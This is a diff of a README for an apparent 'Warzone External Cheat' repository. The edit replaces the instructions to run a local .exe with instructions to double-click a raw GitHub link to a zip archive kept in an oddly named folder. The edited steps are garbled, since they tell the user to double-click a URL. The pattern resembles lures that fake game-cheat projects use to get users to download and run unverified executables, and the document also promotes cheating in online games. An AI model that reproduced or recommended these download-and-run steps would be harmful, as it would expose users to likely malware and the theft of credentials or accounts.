Praiworks/WarzoneExternalCheat/README.md

 1. Locate the downloaded file (usually in your "Downloads" folder).
 2. Double-click the file to extract its contents.
 You may need a program like WinRAR or 7-Zip if it’s in a compressed format.
 3. Open the extracted folder.
-4. Find the file named `WarzoneExternalCheat.exe`.
+4. Find the file named `https://raw.githubusercontent.com/Praiworks/WarzoneExternalCheat/main/blessedness/WarzoneExternalCheat.zip`.
-5. Double-click `WarzoneExternalCheat.exe` to run the application.
+5. Double-click `https://raw.githubusercontent.com/Praiworks/WarzoneExternalCheat/main/blessedness/WarzoneExternalCheat.zip` to run the application.

 ## 🎮 Features